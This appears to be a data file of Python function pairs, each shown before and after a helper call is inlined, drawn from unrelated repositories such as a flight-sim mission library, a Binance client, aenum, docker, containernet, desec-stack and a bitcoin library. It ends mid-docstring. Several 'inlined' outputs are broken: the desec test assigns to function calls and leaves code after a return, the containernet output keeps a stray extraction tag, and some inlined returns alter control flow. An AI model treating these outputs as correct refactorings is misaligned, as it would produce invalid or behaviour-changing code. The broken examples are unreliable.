start_type(StartType): of the flight if starts from airport
frequency: VHF-AM frequencey in mhz
Returns:
FlyingGroup: the created AWACS flight group
"""
if airport:
if task.AWACS is None:
task.AWACS = plane_type.task_default
if task.AWACS is None:
raise ValueError(f'No main task was given and {plane_type.name} does not have a default task')
ag: unitgroup.FlyingGroup
if plane_type.helicopter:
ag = self.helicopter_group(name)
else:
ag = self.plane_group(name)
ag.task = task.AWACS.name
group_size = min(group_size, plane_type.group_size_max)
for i in range(1, group_size + 1):
p = self.aircraft(name + ' Pilot #{nr}'.format(nr=i), plane_type, country)
ag.add_unit(p)
country.add_aircraft_group(self._flying_group_from_airport(country, ag, task.AWACS, airport, start_type, parking_slots))
awacs = ag
wp = awacs.add_runway_waypoint(airport)
else:
p = position.point_from_heading((heading + 180) % 360, 2000)
if task.AWACS is None:
task.AWACS = plane_type.task_default
if task.AWACS is None:
raise ValueError(f'No main task was given and {plane_type.name} does not have a default task')
ag: unitgroup.FlyingGroup
if plane_type.helicopter:
ag = self.helicopter_group(name)
speed = speed if speed else 200
else:
ag = self.plane_group(name)
speed = speed if speed else 600
ag.task = task.AWACS.name
group_size = min(group_size, plane_type.group_size_max)
for i in range(1, group_size + 1):
p = self.aircraft(name + ' Pilot #{nr}'.format(nr=i), plane_type, country)
p.position = copy.copy(p)
p.fuel = int(p.fuel * 0.9)
ag.add_unit(p)
country.add_aircraft_group(self._flying_group_inflight(country, ag, task.AWACS, altitude, speed))
awacs = ag
p = position.point_from_heading(heading + 180, 1000)
wp = awacs.add_waypoint(p, altitude, speed)
wp.tasks.append(task.SetFrequencyCommand(frequency))
wp = awacs.add_waypoint(position, altitude, speed)
wp.tasks.append(task.OrbitAction(altitude, speed, task.OrbitAction.OrbitPattern.RaceTrack))
p = position.point_from_heading(heading, race_distance)
awacs.add_waypoint(p, altitude, speed)
return awacs
|
dcs
|
positive
|
def get_index_candlestick_data(self, pair: 'str', interval: 'CandlestickInterval', startTime: 'long'=None, endTime: 'long'=None, limit: 'int'=None) -> any:
"""
Index Kline/Candlestick Data (MARKET_DATA)
GET /dapi/v1/indexPriceKlines
Index Kline/candlestick bars for a pair. Klines are uniquely identified by their open time.
"""
response = call_sync(self.request_impl.get_index_candlestick_data(pair, interval, startTime, endTime, limit))
<DeepExtract>
for (k, v) in response[1].items():
self.limits[k] = v
</DeepExtract>
return response[0]
|
def get_index_candlestick_data(self, pair: 'str', interval: 'CandlestickInterval', startTime: 'long'=None, endTime: 'long'=None, limit: 'int'=None) -> any:
"""
Index Kline/Candlestick Data (MARKET_DATA)
GET /dapi/v1/indexPriceKlines
Index Kline/candlestick bars for a pair. Klines are uniquely identified by their open time.
"""
response = call_sync(self.request_impl.get_index_candlestick_data(pair, interval, startTime, endTime, limit))
for (k, v) in response[1].items():
self.limits[k] = v
return response[0]
|
Binance_Futures_python
|
positive
|
def __call__(cls, *args, **kwds):
"""Creates a new NamedTuple class or an instance of a NamedTuple subclass.
NamedTuple should have args of (class_name, names, module)
`names` can be:
* A string containing member names, separated either with spaces or
commas. Values are auto-numbered from 1.
* An iterable of member names. Values are auto-numbered from 1.
* An iterable of (member name, value) pairs.
* A mapping of member name -> value.
`module`, if set, will be stored in the new class' __module__ attribute;
Note: if `module` is not set this routine will attempt to discover the
calling module by walking the frame stack; if this is unsuccessful
the resulting class will not be pickleable.
subclass should have whatever arguments and/or keywords will be used to create an
instance of the subclass
"""
if cls is NamedTuple:
original_args = args
original_kwds = kwds.copy()
try:
if 'class_name' in kwds:
class_name = kwds.pop('class_name')
else:
(class_name, args) = (args[0], args[1:])
if 'names' in kwds:
names = kwds.pop('names')
else:
(names, args) = (args[0], args[1:])
if 'module' in kwds:
module = kwds.pop('module')
elif args:
(module, args) = (args[0], args[1:])
else:
module = None
if 'type' in kwds:
type = kwds.pop('type')
elif args:
(type, args) = (args[0], args[1:])
else:
type = None
except IndexError:
raise TypeError('too few arguments to NamedTuple: %s, %s' % (original_args, original_kwds))
if args or kwds:
raise TypeError('too many arguments to NamedTuple: %s, %s' % (original_args, original_kwds))
if PY2:
if isinstance(class_name, unicode):
try:
class_name = class_name.encode('ascii')
except UnicodeEncodeError:
raise TypeError('%r is not representable in ASCII' % (class_name,))
if isinstance(names, NamedTupleMeta):
names.__name__ = class_name
if type is not None and type not in names.__bases__:
names.__bases__ = (type,) + names.__bases__
return names
metacls = cls.__class__
bases = (cls,)
clsdict = metacls.__prepare__(class_name, bases)
if isinstance(names, basestring):
names = names.replace(',', ' ').split()
if isinstance(names, (tuple, list)) and isinstance(names[0], basestring):
names = [(e, i) for (i, e) in enumerate(names)]
item = None
for item in names:
if isinstance(item, basestring):
(field_name, field_index) = (item, names[item])
elif len(item) == 2:
(field_name, field_index) = item
else:
(field_name, field_index) = (item[0], item[1:])
clsdict[field_name] = field_index
if type is not None:
if not isinstance(type, tuple):
type = (type,)
bases = type + bases
namedtuple_class = metacls.__new__(metacls, class_name, bases, clsdict)
if module is None:
try:
module = _sys._getframe(1).f_globals['__name__']
except (AttributeError, ValueError, KeyError):
pass
if module is None:
<DeepExtract>
def _break_on_call_reduce(self, proto):
raise TypeError('%r cannot be pickled' % self)
if isinstance(namedtuple_class, dict):
namedtuple_class['__reduce_ex__'] = _break_on_call_reduce
namedtuple_class['__module__'] = '<unknown>'
else:
setattr(namedtuple_class, '__reduce_ex__', _break_on_call_reduce)
setattr(namedtuple_class, '__module__', '<unknown>')
</DeepExtract>
else:
namedtuple_class.__module__ = module
return namedtuple_class
else:
namedtuple_instance = cls.__new__(cls, *args, **kwds)
if isinstance(namedtuple_instance, cls):
namedtuple_instance.__init__(*args, **kwds)
return namedtuple_instance
|
def __call__(cls, *args, **kwds):
"""Creates a new NamedTuple class or an instance of a NamedTuple subclass.
NamedTuple should have args of (class_name, names, module)
`names` can be:
* A string containing member names, separated either with spaces or
commas. Values are auto-numbered from 1.
* An iterable of member names. Values are auto-numbered from 1.
* An iterable of (member name, value) pairs.
* A mapping of member name -> value.
`module`, if set, will be stored in the new class' __module__ attribute;
Note: if `module` is not set this routine will attempt to discover the
calling module by walking the frame stack; if this is unsuccessful
the resulting class will not be pickleable.
subclass should have whatever arguments and/or keywords will be used to create an
instance of the subclass
"""
if cls is NamedTuple:
original_args = args
original_kwds = kwds.copy()
try:
if 'class_name' in kwds:
class_name = kwds.pop('class_name')
else:
(class_name, args) = (args[0], args[1:])
if 'names' in kwds:
names = kwds.pop('names')
else:
(names, args) = (args[0], args[1:])
if 'module' in kwds:
module = kwds.pop('module')
elif args:
(module, args) = (args[0], args[1:])
else:
module = None
if 'type' in kwds:
type = kwds.pop('type')
elif args:
(type, args) = (args[0], args[1:])
else:
type = None
except IndexError:
raise TypeError('too few arguments to NamedTuple: %s, %s' % (original_args, original_kwds))
if args or kwds:
raise TypeError('too many arguments to NamedTuple: %s, %s' % (original_args, original_kwds))
if PY2:
if isinstance(class_name, unicode):
try:
class_name = class_name.encode('ascii')
except UnicodeEncodeError:
raise TypeError('%r is not representable in ASCII' % (class_name,))
if isinstance(names, NamedTupleMeta):
names.__name__ = class_name
if type is not None and type not in names.__bases__:
names.__bases__ = (type,) + names.__bases__
return names
metacls = cls.__class__
bases = (cls,)
clsdict = metacls.__prepare__(class_name, bases)
if isinstance(names, basestring):
names = names.replace(',', ' ').split()
if isinstance(names, (tuple, list)) and isinstance(names[0], basestring):
names = [(e, i) for (i, e) in enumerate(names)]
item = None
for item in names:
if isinstance(item, basestring):
(field_name, field_index) = (item, names[item])
elif len(item) == 2:
(field_name, field_index) = item
else:
(field_name, field_index) = (item[0], item[1:])
clsdict[field_name] = field_index
if type is not None:
if not isinstance(type, tuple):
type = (type,)
bases = type + bases
namedtuple_class = metacls.__new__(metacls, class_name, bases, clsdict)
if module is None:
try:
module = _sys._getframe(1).f_globals['__name__']
except (AttributeError, ValueError, KeyError):
pass
if module is None:
def _break_on_call_reduce(self, proto):
raise TypeError('%r cannot be pickled' % self)
if isinstance(namedtuple_class, dict):
namedtuple_class['__reduce_ex__'] = _break_on_call_reduce
namedtuple_class['__module__'] = '<unknown>'
else:
setattr(namedtuple_class, '__reduce_ex__', _break_on_call_reduce)
setattr(namedtuple_class, '__module__', '<unknown>')
else:
namedtuple_class.__module__ = module
return namedtuple_class
else:
namedtuple_instance = cls.__new__(cls, *args, **kwds)
if isinstance(namedtuple_instance, cls):
namedtuple_instance.__init__(*args, **kwds)
return namedtuple_instance
|
aenum
|
positive
|
def read_exactly(socket, n):
"""
Reads exactly n bytes from socket
Raises SocketError if there isn't enough data
"""
data = binary_type()
while len(data) < n:
<DeepExtract>
recoverable_errors = (errno.EINTR, errno.EDEADLK, errno.EWOULDBLOCK)
if PY3 and (not isinstance(socket, NpipeSocket)):
select.select([socket], [], [])
try:
if hasattr(socket, 'recv'):
next_data = socket.recv(n - len(data))
if PY3 and isinstance(socket, getattr(pysocket, 'SocketIO')):
next_data = socket.read(n - len(data))
next_data = os.read(socket.fileno(), n - len(data))
except EnvironmentError as e:
if e.errno not in recoverable_errors:
raise
except Exception as e:
is_pipe_ended = isinstance(socket, NpipeSocket) and len(e.args) > 0 and (e.args[0] == NPIPE_ENDED)
if is_pipe_ended:
next_data = 0
raise
</DeepExtract>
if not next_data:
raise SocketError('Unexpected EOF')
data += next_data
return data
|
def read_exactly(socket, n):
"""
Reads exactly n bytes from socket
Raises SocketError if there isn't enough data
"""
data = binary_type()
while len(data) < n:
recoverable_errors = (errno.EINTR, errno.EDEADLK, errno.EWOULDBLOCK)
if PY3 and (not isinstance(socket, NpipeSocket)):
select.select([socket], [], [])
try:
if hasattr(socket, 'recv'):
next_data = socket.recv(n - len(data))
if PY3 and isinstance(socket, getattr(pysocket, 'SocketIO')):
next_data = socket.read(n - len(data))
next_data = os.read(socket.fileno(), n - len(data))
except EnvironmentError as e:
if e.errno not in recoverable_errors:
raise
except Exception as e:
is_pipe_ended = isinstance(socket, NpipeSocket) and len(e.args) > 0 and (e.args[0] == NPIPE_ENDED)
if is_pipe_ended:
next_data = 0
raise
if not next_data:
raise SocketError('Unexpected EOF')
data += next_data
return data
|
community.docker
|
positive
|
def testCPULimitCFSBased(self):
"""
d1, d2 with CPU share limits
"""
<DeepExtract>
self.net = Containernet(controller=Controller)
self.net.addController('c0')
for i in range(0, 1):
self.s.append(self.net.addSwitch('s%d' % i))
if autolinkswitches:
for i in range(0, len(self.s) - 1):
self.net.addLink(self.s[i], self.s[i + 1])
for i in range(0, 0):
self.h.append(self.net.addHost('h%d' % i))
for i in range(0, 0):
self.d.append(self.net.addDocker('d%d' % i, dimage='ubuntu:trusty'))
</DeepExtract>
d0 = self.net.addDocker('d0', ip='10.0.0.1', dimage='ubuntu:trusty', cpu_period=50000, cpu_quota=10000)
d1 = self.net.addDocker('d1', ip='10.0.0.2', dimage='ubuntu:trusty', cpu_period=50000, cpu_quota=10000)
self.net.addLink(d0, self.s[0])
self.net.addLink(d1, self.s[0])
<DeepExtract>
self.net.start()
</DeepExtract>
self.assertTrue(len(self.net.hosts) == 2)
self.assertTrue(self.net.ping([d0, d1]) <= 0.0)
<DeepExtract>
self.net.stop()
self.s = []
self.h = []
self.d = []
</DeepExtract>
|
def testCPULimitCFSBased(self):
"""
d1, d2 with CPU share limits
"""
self.net = Containernet(controller=Controller)
self.net.addController('c0')
for i in range(0, 1):
self.s.append(self.net.addSwitch('s%d' % i))
if autolinkswitches:
for i in range(0, len(self.s) - 1):
self.net.addLink(self.s[i], self.s[i + 1])
for i in range(0, 0):
self.h.append(self.net.addHost('h%d' % i))
for i in range(0, 0):
self.d.append(self.net.addDocker('d%d' % i, dimage='ubuntu:trusty'))
d0 = self.net.addDocker('d0', ip='10.0.0.1', dimage='ubuntu:trusty', cpu_period=50000, cpu_quota=10000)
d1 = self.net.addDocker('d1', ip='10.0.0.2', dimage='ubuntu:trusty', cpu_period=50000, cpu_quota=10000)
self.net.addLink(d0, self.s[0])
self.net.addLink(d1, self.s[0])
self.net.start()
self.assertTrue(len(self.net.hosts) == 2)
self.assertTrue(self.net.ping([d0, d1]) <= 0.0)
self.net.stop()
self.s = []
self.h = []
self.d = []
</DeepExtract>
|
containernet
|
positive
|
def get_input_location(location):
"""
Similar to :meth:`get_input_peer`, but for input messages.
Note that this returns a tuple ``(dc_id, location)``, the
``dc_id`` being present if known.
"""
<DeepExtract>
try:
if location.SUBCLASS_OF_ID == 354669666:
info = _FileInfo(None, location, None)
except AttributeError:
_raise_cast_fail(location, 'InputFileLocation')
if isinstance(location, types.Message):
location = location.media
if isinstance(location, types.MessageMediaDocument):
location = location.document
elif isinstance(location, types.MessageMediaPhoto):
location = location.photo
if isinstance(location, types.Document):
info = _FileInfo(location.dc_id, types.InputDocumentFileLocation(id=location.id, access_hash=location.access_hash, file_reference=location.file_reference, thumb_size=''), location.size)
elif isinstance(location, types.Photo):
info = _FileInfo(location.dc_id, types.InputPhotoFileLocation(id=location.id, access_hash=location.access_hash, file_reference=location.file_reference, thumb_size=location.sizes[-1].type), _photo_size_byte_count(location.sizes[-1]))
if isinstance(location, types.FileLocationToBeDeprecated):
raise TypeError('Unavailable location cannot be used as input')
_raise_cast_fail(location, 'InputFileLocation')
</DeepExtract>
return (info.dc_id, info.location)
|
def get_input_location(location):
"""
Similar to :meth:`get_input_peer`, but for input messages.
Note that this returns a tuple ``(dc_id, location)``, the
``dc_id`` being present if known.
"""
try:
if location.SUBCLASS_OF_ID == 354669666:
info = _FileInfo(None, location, None)
except AttributeError:
_raise_cast_fail(location, 'InputFileLocation')
if isinstance(location, types.Message):
location = location.media
if isinstance(location, types.MessageMediaDocument):
location = location.document
elif isinstance(location, types.MessageMediaPhoto):
location = location.photo
if isinstance(location, types.Document):
info = _FileInfo(location.dc_id, types.InputDocumentFileLocation(id=location.id, access_hash=location.access_hash, file_reference=location.file_reference, thumb_size=''), location.size)
elif isinstance(location, types.Photo):
info = _FileInfo(location.dc_id, types.InputPhotoFileLocation(id=location.id, access_hash=location.access_hash, file_reference=location.file_reference, thumb_size=location.sizes[-1].type), _photo_size_byte_count(location.sizes[-1]))
if isinstance(location, types.FileLocationToBeDeprecated):
raise TypeError('Unavailable location cannot be used as input')
_raise_cast_fail(location, 'InputFileLocation')
return (info.dc_id, info.location)
|
Awesome-Scripts
|
positive
|
def test_registration_known_account(self):
<DeepExtract>
(self.random_username(), self.random_password(), response) = self.register_user(self.random_username(), self.random_password(), late_captcha, **kwargs)
self.assertRegistrationSuccessResponse(response)
self.assertUserExists(self.random_username())
self.assertFalse(User.objects.get(email=self.random_username()).is_active)
self.assertIsNone(User.objects.get(email=self.random_username()).is_active)
self.assertEqual(User.objects.get(email=self.random_username()).needs_captcha, late_captcha)
self.assertEqual(User.objects.get(email=self.random_username()).outreach_preference, kwargs.get('outreach_preference', True))
self.assertPassword(self.random_username(), self.random_password())
confirmation_link = self.assertRegistrationEmail(self.random_username())
self.assertConfirmationLinkRedirect(confirmation_link)
response = self.client.verify(confirmation_link)
if late_captcha:
self.assertRegistrationVerificationFailureResponse(response)
(captcha_id, captcha_solution) = self.get_captcha()
data = {'captcha': {'id': captcha_id, 'solution': captcha_solution}}
response = self.client.verify(confirmation_link, data=data)
self.assertRegistrationVerificationSuccessResponse(response)
self.assertTrue(User.objects.get(email=self.random_username()).is_active)
self.assertFalse(User.objects.get(email=self.random_username()).needs_captcha)
self.assertPassword(self.random_username(), self.random_password())
(self.random_username(), _) = (self.random_username(), self.random_password())
</DeepExtract>
<DeepExtract>
return self.assertContains(response=self.register_user(email, self.random_password())[2], text='Welcome! Please check your mailbox.', status_code=status.HTTP_202_ACCEPTED)
</DeepExtract>
self.assertNoEmailSent()
|
def test_registration_known_account(self):
(self.random_username(), self.random_password(), response) = self.register_user(self.random_username(), self.random_password(), late_captcha, **kwargs)
self.assertRegistrationSuccessResponse(response)
self.assertUserExists(self.random_username())
self.assertFalse(User.objects.get(email=self.random_username()).is_active)
self.assertIsNone(User.objects.get(email=self.random_username()).is_active)
self.assertEqual(User.objects.get(email=self.random_username()).needs_captcha, late_captcha)
self.assertEqual(User.objects.get(email=self.random_username()).outreach_preference, kwargs.get('outreach_preference', True))
self.assertPassword(self.random_username(), self.random_password())
confirmation_link = self.assertRegistrationEmail(self.random_username())
self.assertConfirmationLinkRedirect(confirmation_link)
response = self.client.verify(confirmation_link)
if late_captcha:
self.assertRegistrationVerificationFailureResponse(response)
(captcha_id, captcha_solution) = self.get_captcha()
data = {'captcha': {'id': captcha_id, 'solution': captcha_solution}}
response = self.client.verify(confirmation_link, data=data)
self.assertRegistrationVerificationSuccessResponse(response)
self.assertTrue(User.objects.get(email=self.random_username()).is_active)
self.assertFalse(User.objects.get(email=self.random_username()).needs_captcha)
self.assertPassword(self.random_username(), self.random_password())
(self.random_username(), _) = (self.random_username(), self.random_password())
return self.assertContains(response=self.register_user(email, self.random_password())[2], text='Welcome! Please check your mailbox.', status_code=status.HTTP_202_ACCEPTED)
self.assertNoEmailSent()
|
desec-stack
|
positive
|
def send(self, outputs, fee=None, absolute_fee=False, leftover=None, combine=True, message=None, unspents=None, message_is_hex=False, replace_by_fee=False):
"""Creates a signed P2PKH transaction and attempts to broadcast it on
the testnet blockchain. This accepts the same arguments as
:func:`~bit.PrivateKeyTestnet.create_transaction`.
:param outputs: A sequence of outputs you wish to send in the form
``(destination, amount, currency)``. The amount can
be either an int, float, or string as long as it is
a valid input to ``decimal.Decimal``. The currency
must be :ref:`supported <supported currencies>`.
:type outputs: ``list`` of ``tuple``
:param fee: The number of satoshi per byte to pay to miners. By default
Bit will poll `<https://bitcoinfees.earn.com>`_ and use a fee
that will allow your transaction to be confirmed as soon as
possible.
:type fee: ``int``
:param leftover: The destination that will receive any change from the
transaction. By default Bit will send any change to
the same address you sent from.
:type leftover: ``str``
:param combine: Whether or not Bit should use all available UTXOs to
make future transactions smaller and therefore reduce
fees. By default Bit will consolidate UTXOs. Note: When
setting :param absolute_fee: this is ignored.
:type combine: ``bool``
:param message: A message to include in the transaction. This will be
stored in the blockchain forever. Due to size limits,
each message will be stored in chunks of 40 bytes.
:type message: ``str``
:param unspents: The UTXOs to use as the inputs. By default Bit will
communicate with the testnet blockchain itself.
:type unspents: ``list`` of :class:`~bit.network.meta.Unspent`
:param replace_by_fee: Whether to opt-in for replace-by-fee (BIP 125).
:type replace_by_fee: ``bool``
:returns: The transaction ID.
:rtype: ``str``
"""
<DeepExtract>
try:
unspents = unspents or self.get_unspents()
except ConnectionError:
raise ConnectionError('All APIs are unreachable. Please provide the unspents to spend from directly.')
return_address = self.segwit_address if any([u.segwit for u in unspents]) else self.address
(unspents, outputs) = sanitize_tx_data(unspents, outputs, fee or get_fee_cached(), leftover or return_address, combine=combine, message=message, absolute_fee=absolute_fee, version=self.version, message_is_hex=message_is_hex, replace_by_fee=replace_by_fee)
tx_hex = create_new_transaction(self, unspents, outputs)
</DeepExtract>
NetworkAPI.broadcast_tx_testnet(tx_hex)
return calc_txid(tx_hex)
|
def send(self, outputs, fee=None, absolute_fee=False, leftover=None, combine=True, message=None, unspents=None, message_is_hex=False, replace_by_fee=False):
"""Creates a signed P2PKH transaction and attempts to broadcast it on
the testnet blockchain. This accepts the same arguments as
:func:`~bit.PrivateKeyTestnet.create_transaction`.
:param outputs: A sequence of outputs you wish to send in the form
``(destination, amount, currency)``. The amount can
be either an int, float, or string as long as it is
a valid input to ``decimal.Decimal``. The currency
must be :ref:`supported <supported currencies>`.
:type outputs: ``list`` of ``tuple``
:param fee: The number of satoshi per byte to pay to miners. By default
Bit will poll `<https://bitcoinfees.earn.com>`_ and use a fee
that will allow your transaction to be confirmed as soon as
possible.
:type fee: ``int``
:param leftover: The destination that will receive any change from the
transaction. By default Bit will send any change to
the same address you sent from.
:type leftover: ``str``
:param combine: Whether or not Bit should use all available UTXOs to
make future transactions smaller and therefore reduce
fees. By default Bit will consolidate UTXOs. Note: When
setting :param absolute_fee: this is ignored.
:type combine: ``bool``
:param message: A message to include in the transaction. This will be
stored in the blockchain forever. Due to size limits,
each message will be stored in chunks of 40 bytes.
:type message: ``str``
:param unspents: The UTXOs to use as the inputs. By default Bit will
communicate with the testnet blockchain itself.
:type unspents: ``list`` of :class:`~bit.network.meta.Unspent`
:param replace_by_fee: Whether to opt-in for replace-by-fee (BIP 125).
:type replace_by_fee: ``bool``
:returns: The transaction ID.
:rtype: ``str``
"""
try:
unspents = unspents or self.get_unspents()
except ConnectionError:
raise ConnectionError('All APIs are unreachable. Please provide the unspents to spend from directly.')
return_address = self.segwit_address if any([u.segwit for u in unspents]) else self.address
(unspents, outputs) = sanitize_tx_data(unspents, outputs, fee or get_fee_cached(), leftover or return_address, combine=combine, message=message, absolute_fee=absolute_fee, version=self.version, message_is_hex=message_is_hex, replace_by_fee=replace_by_fee)
tx_hex = create_new_transaction(self, unspents, outputs)
NetworkAPI.broadcast_tx_testnet(tx_hex)
return calc_txid(tx_hex)
|
bit
|
positive
|
def _start_delete_account(self):
<DeepExtract>
return self.assertContains(response=self.delete_account(self.email, self.password), text='Please check your mailbox for further account deletion instructions.', status_code=status.HTTP_202_ACCEPTED)
</DeepExtract>
return self.assertDeleteAccountEmail(self.email)
|
def _start_delete_account(self):
return self.assertContains(response=self.delete_account(self.email, self.password), text='Please check your mailbox for further account deletion instructions.', status_code=status.HTTP_202_ACCEPTED)
return self.assertDeleteAccountEmail(self.email)
|
desec-stack
|
positive
|
def _start_galaxy():
<DeepExtract>
sudo("mkdir -p '%s'" % '/var/lib/galaxy')
_chown_galaxy(env, '/var/lib/galaxy')
</DeepExtract>
start_service('galaxy')
|
def _start_galaxy():
sudo("mkdir -p '%s'" % '/var/lib/galaxy')
_chown_galaxy(env, '/var/lib/galaxy')
start_service('galaxy')
|
cloudbiolinux
|
positive
|
def compute_tDCF_C012(asv_score_pd, factor_name_v, factor_value_v, factor_type_v, factor_name_h, factor_value_h, factor_type_h, cost_model=config.cost_model, pooled_tag=config.g_pooled_tag, target_tag=config.g_target_tag, nontarget_tag=config.g_nontarget_tag, spoofed_tag=config.g_spoofed_tag, col_score_name=config.g_score_col_name, flag_verbose=False):
"""C012_dict = compute_tDCF_C012(asv_score_pd,
factor_name_v,
factor_value_v,
factor_type_v,
factor_name_h,
factor_value_h,
factor_type_h,
cost_model = config.cost_model,
pooled_tag = 'Pooled',
target_tag = 'target',
nontarget_tag = 'nontarget',
spoofed_tag = 'spoof',
col_score_name = 'score',
flag_verbose = False)
Function to loop over two sets of factors and compute C012.
The output C012_dict can be used to compute min tDCF values
input
-----
asv_score_pd dataFrame, joint dataframe of ASV score and protocol
factor_name_v str or list of str,
name(s) of the dataFrame series for the 1st set of factor.
factor_value_v list of str, or list of list or str,
values of the 1st set of factors
if type(factor_name_v) is str:
# we retrieve the data by
for factor in factor_value_v:
data = score_pd.query('factor_name_v == "factor"')
if type(factor_name_v) is list
# we iterate all the factors
for factor_name, factor_value in zip(factor_name_v, factor_value_v):
for factor in factor_value:
data = score_pd.query('factor_name == "factor"')
The second case is useful when the 1st set of factors
are defined in different data series of score_pd.
factor_type_v str or list of str, type of the factor
'spoof': this factor is only available for spoofed data
'bonafide': this factor is only available for bonafide data
'both': this factor appears in both spoofed and bonafide data
if type(factor_name_v) is str:
# factor_type_v is the type for factor_name_v
if type(factor_name_v) is list:
# factor_type_v should be a list and
# factor_type_v[i] is the type for factor_name_v[i]
factor_name_h str or list of str,
factor_value_h list of str or list of list of str
factor_type_h str or list of str
these are for the second set of factors
pooled_tag str, tag for pooled condition,
default 'Pooled'
target_tag str, tag for bonafide tareget trials
default 'target'
nontarget_tag str, tag for bonafide non-tareget trials
default 'nontarget'
spooed_tag str, tag for spoofed trials
default 'spoof'
col_score_name str, name of the column for score
default 'score'
output
------
C012_dict dictionary of C012 values
C012[factor_1][factor_2]['C0'] -> C0
C012[factor_1][factor_2]['C1'] -> C1
C012[factor_1][factor_2]['C2'] -> C2
"""
def _wrap_list(data):
return [data] if type(data) is str else data
def _wrap_list_list(data):
return [data] if type(data[0]) is str else data
<DeepExtract>
factor_names_1 = [factor_name_v] if type(factor_name_v) is str else factor_name_v
</DeepExtract>
<DeepExtract>
factor_names_2 = [factor_name_h] if type(factor_name_h) is str else factor_name_h
</DeepExtract>
<DeepExtract>
factor_types_1 = [factor_type_v] if type(factor_type_v) is str else factor_type_v
</DeepExtract>
<DeepExtract>
factor_types_2 = [factor_type_h] if type(factor_type_h) is str else factor_type_h
</DeepExtract>
<DeepExtract>
factor_list_1_list = [factor_value_v] if type(factor_value_v[0]) is str else factor_value_v
</DeepExtract>
<DeepExtract>
factor_list_2_list = [factor_value_h] if type(factor_value_h[0]) is str else factor_value_h
</DeepExtract>
num_row = sum([len(x) for x in factor_list_1_list])
num_col = sum([len(x) for x in factor_list_2_list])
C012 = dict()
print('\n' + ''.join(['-'] * (num_row - 1)) + '>| computing C012 for tDCF')
for (factor_name_1, factor_list_1, factor_type_1) in zip(factor_names_1, factor_list_1_list, factor_types_1):
for (_, factor_1) in enumerate(factor_list_1):
print('.', end='', flush=True)
if factor_1 == pooled_tag:
qr_tar_fac1 = ''
qr_ntar_fac1 = ''
qr_spoof_fac1 = ''
elif factor_type_1 == config.g_factor_type_spoof:
qr_tar_fac1 = ''
qr_ntar_fac1 = ''
qr_spoof_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
elif factor_type_1 == config.g_factor_type_bonafide:
qr_tar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_ntar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_spoof_fac1 = ''
else:
qr_tar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_ntar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_spoof_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
for (factor_name_2, factor_list_2, factor_type_2) in zip(factor_names_2, factor_list_2_list, factor_types_2):
for (_, factor_2) in enumerate(factor_list_2):
if factor_2 == pooled_tag:
qr_tar_fac2 = ''
qr_ntar_fac2 = ''
qr_spoof_fac2 = ''
elif factor_type_2 == config.g_factor_type_spoof:
qr_tar_fac2 = ''
qr_ntar_fac2 = ''
qr_spoof_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
elif factor_type_2 == config.g_factor_type_bonafide:
qr_tar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_ntar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_spoof_fac2 = ''
else:
qr_tar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_ntar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_spoof_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_tar = 'label == "{:s}"'.format(target_tag) + qr_tar_fac1 + qr_tar_fac2
qr_ntar = 'label == "{:s}"'.format(nontarget_tag) + qr_ntar_fac1 + qr_ntar_fac2
qr_spoof = 'label == "{:s}"'.format(spoofed_tag) + qr_spoof_fac1 + qr_spoof_fac2
tar_env_pd = asv_score_pd.query(qr_tar)
ntar_env_pd = asv_score_pd.query(qr_ntar)
spoof_env_pd = asv_score_pd.query(qr_spoof)
tar_data = tar_env_pd[col_score_name].to_numpy()
ntar_data = ntar_env_pd[col_score_name].to_numpy()
spoof_data = spoof_env_pd[col_score_name].to_numpy()
(C0, C1, C2) = eval_wrapper.get_tDCF_C012_from_asv_scores(tar_data, ntar_data, spoof_data, cost_model)
eval_wrapper.save_C012_value(C012, C0, C1, C2, [factor_1, factor_2])
print('')
return C012
|
def compute_tDCF_C012(asv_score_pd, factor_name_v, factor_value_v, factor_type_v, factor_name_h, factor_value_h, factor_type_h, cost_model=config.cost_model, pooled_tag=config.g_pooled_tag, target_tag=config.g_target_tag, nontarget_tag=config.g_nontarget_tag, spoofed_tag=config.g_spoofed_tag, col_score_name=config.g_score_col_name, flag_verbose=False):
"""C012_dict = compute_tDCF_C012(asv_score_pd,
factor_name_v,
factor_value_v,
factor_type_v,
factor_name_h,
factor_value_h,
factor_type_h,
cost_model = config.cost_model,
pooled_tag = 'Pooled',
target_tag = 'target',
nontarget_tag = 'nontarget',
spoofed_tag = 'spoof',
col_score_name = 'score',
flag_verbose = False)
Function to loop over two sets of factors and compute C012.
The output C012_dict can be used to compute min tDCF values
input
-----
asv_score_pd dataFrame, joint dataframe of ASV score and protocol
factor_name_v str or list of str,
name(s) of the dataFrame series for the 1st set of factor.
factor_value_v list of str, or list of list or str,
values of the 1st set of factors
if type(factor_name_v) is str:
# we retrieve the data by
for factor in factor_value_v:
data = score_pd.query('factor_name_v == "factor"')
if type(factor_name_v) is list
# we iterate all the factors
for factor_name, factor_value in zip(factor_name_v, factor_value_v):
for factor in factor_value:
data = score_pd.query('factor_name == "factor"')
The second case is useful when the 1st set of factors
are defined in different data series of score_pd.
factor_type_v str or list of str, type of the factor
'spoof': this factor is only available for spoofed data
'bonafide': this factor is only available for bonafide data
'both': this factor appears in both spoofed and bonafide data
if type(factor_name_v) is str:
# factor_type_v is the type for factor_name_v
if type(factor_name_v) is list:
# factor_type_v should be a list and
# factor_type_v[i] is the type for factor_name_v[i]
factor_name_h str or list of str,
factor_value_h list of str or list of list of str
factor_type_h str or list of str
these are for the second set of factors
pooled_tag str, tag for pooled condition,
default 'Pooled'
target_tag str, tag for bonafide tareget trials
default 'target'
nontarget_tag str, tag for bonafide non-tareget trials
default 'nontarget'
spooed_tag str, tag for spoofed trials
default 'spoof'
col_score_name str, name of the column for score
default 'score'
output
------
C012_dict dictionary of C012 values
C012[factor_1][factor_2]['C0'] -> C0
C012[factor_1][factor_2]['C1'] -> C1
